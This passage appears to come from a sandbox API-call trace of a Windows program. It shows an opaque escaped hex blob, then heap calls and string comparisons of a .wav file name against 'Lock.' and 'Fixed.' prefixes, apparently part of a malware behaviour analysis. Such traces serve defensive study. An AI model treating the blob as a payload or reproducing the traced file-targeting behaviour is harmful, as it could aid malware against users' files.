92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0251.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0251.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.957] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0251.957] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.957] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0251.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0251.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0251.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0251.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0251.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0251.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0251.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0251.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HwKg28SMvdgN7pz7S.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wKg28SMvdgN7pz7S.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kg28SMvdgN7pz7S.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g28SMvdgN7pz7S.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="28SMvdgN7pz7S.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8SMvdgN7pz7S.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SMvdgN7pz7S.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MvdgN7pz7S.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vdgN7pz7S.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dgN7pz7S.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gN7pz7S.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N7pz7S.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7pz7S.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pz7S.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z7S.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7S.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0251.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0251.961] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0251.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0251.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0251.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0251.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0251.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0251.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0251.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0251.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2c) returned 0x24b3500 [0251.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0251.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HwKg28SMvdgN7pz7S.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wKg28SMvdgN7pz7S.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kg28SMvdgN7pz7S.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g28SMvdgN7pz7S.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="28SMvdgN7pz7S.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8SMvdgN7pz7S.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SMvdgN7pz7S.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MvdgN7pz7S.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vdgN7pz7S.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dgN7pz7S.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gN7pz7S.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N7pz7S.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7pz7S.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pz7S.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z7S.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7S.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b34c8 [0251.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0251.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b34c8 | out: hHeap=0x25c0000) returned 1 [0251.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.964] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0251.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0251.964] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0251.964] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0251.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0251.965] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0251.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0251.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0251.965] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0251.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0251.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0251.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0251.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0251.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0251.966] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0251.966] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, 